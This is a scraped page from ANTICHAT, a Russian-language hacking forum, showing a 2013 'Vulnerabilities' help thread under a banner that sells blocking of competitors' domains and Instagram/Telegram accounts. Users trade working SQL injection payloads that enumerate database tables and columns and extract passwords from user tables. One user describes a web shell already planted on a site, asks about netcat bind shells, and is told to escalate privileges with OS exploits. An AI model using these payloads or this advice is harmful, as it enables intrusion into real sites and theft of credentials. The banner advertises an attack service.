УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2266 из 2438

2266

Опции темы

Поиск в этой теме

Опции просмотра

#22651

05.08.2013, 20:07

VK_unreg

Guest

Сообщений: n/a

Провел на форуме:
4553

Репутация: 0

Цитата:

Сообщение от seozone

seozone said:
Ребят, нашёл это: http://rp-gameworld.ru/misc/ что можно сделать с этим?

да ты порутал этот серв ничего с этого не поимеешь бро

#22652

06.08.2013, 12:41

cipa21

Новичок

Регистрация: 09.04.2009

Сообщений: 8

Провел на форуме:
71852

Репутация: 0

Ребята подскажите кто сталкивался, в инъекции не пропускает скобки id=-7888+union+select+1,2,3,database(),5,6,7,8,9,10,11 ,12,13,14,15,16,17--

как это можно обойти?

#22653

06.08.2013, 13:52

YaBtr

Guest

Сообщений: n/a

Провел на форуме:
132418

Репутация: 652

Цитата:

Сообщение от cipa21

cipa21 said:
Ребята подскажите кто сталкивался, в инъекции не пропускает скобки id=-7888+union+select+1,2,3,database(),5,6,7,8,9,10,11 ,12,13,14,15,16,17--
как это можно обойти?

Попробуй следующие запросы:

id=-7888+union+select+1,2,3,table_name,5,6,7,8,9,10,11 ,12,13,14,15,16,17 from information_schema.tables limit n,1+--+

id=-7888+union+select+1,2,3,column_name,5,6,7,8,9,10,1 1,12,13,14,15,16,17 from information_schema.columns where table_name=[таблица] или 0x[hex таблицы] limit n,1+--+

Попробуй перебор стандартных пользовательских таблиц:

id=-7888+union+select+1,2,3,password,5,6,7,8,9,10,11,1 2,13,14,15,16,17 from [таблица пользователей]+--+

Также иногда помогает hex: 0x[user],0x[password]

#22654

12.08.2013, 16:04

BigBear

Новичок

Регистрация: 04.12.2008

Сообщений: 11

Провел на форуме:
69033

Репутация: 8

Цитата:

Сообщение от cipa21

id=-7888+union+select+1,2,3,@@version,5,6,7,8,9,10,11, 12,13,14,15,16,17--

пропускает ?

#22655

13.08.2013, 14:04

sfinxs

Новичок

Регистрация: 20.02.2008

Сообщений: 2

Провел на форуме:
23939

Репутация: 1

Привет . Есть вопрос про шелл . Вообшем залил шелл пробую закинуть какой нибудь пхп файл . пишет : ERROR cant c hmod 0777 . То есть надо как то присвоить права администратора или как обойти ето? spasibo

#22656

13.08.2013, 14:18

YaBtr

Guest

Сообщений: n/a

Провел на форуме:
132418

Репутация: 652

Цитата:

Сообщение от sfinxs

sfinxs said:
Привет . Есть вопрос про шелл . Вообшем залил шелл пробую закинуть какой нибудь пхп файл . пишет : ERROR cant c hmod 0777 . То есть надо как то присвоить права администратора или как обойти ето? spasibo

Команда chmod

+x - позволяет только запускать скрипт.

+rx - позволяет запускать и просматривать содержимое.

Также посмотрите и почитайте числовую установку прав доступа.

#22657

13.08.2013, 14:41

sfinxs

Новичок

Регистрация: 20.02.2008

Сообщений: 2

Провел на форуме:
23939

Репутация: 1

спс. а где ето ? на счет прав доступа неполучаеться поменять . пишет : админ - все доступы . ГРОУП - read only . другие : вообше нет. надо BIND делать и с netcat подключаться или по другому можно? )

#22658

13.08.2013, 14:58

YaBtr

Guest

Сообщений: n/a

Провел на форуме:
132418

Репутация: 652

Цитата:

Сообщение от sfinxs

sfinxs said:
спс. а где ето ? на счет прав доступа неполучаеться поменять . пишет : админ - все доступы . ГРОУП - read only . другие : вообше нет. надо BIND делать и с netcat подключаться или по другому можно? )

Попробуйте повысить права:

Версия операционной системы --> exploit

#22659

13.08.2013, 15:21

sfinxs

Новичок

Регистрация: 20.02.2008

Сообщений: 2

Провел на форуме:
23939

Репутация: 1

самописный у него движок . ненаходит сканнер . Индекс.хтмл файла нету вообше. только индех.пх . где мануал какой нить ?

#22660

13.08.2013, 15:32

qaz

Guest

Сообщений: n/a

Провел на форуме:
344922

Репутация: 75

Цитата:

Сообщение от sfinxs

sfinxs said:
самописный у него движок . ненаходит сканнер .

движок тут вобще не причём, под словами ,,Версия операционной системы --> exploit,, имеется в виду порутать серв

Цитата:

Сообщение от sfinxs

sfinxs said:
Индекс.хтмл файла нету вообше.

ну понятное дело, все на пхп написано

Цитата:

Сообщение от sfinxs

sfinxs said:
где мануал какой нить ?

мануал по чём?

Страница 2266 из 2438

2266

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход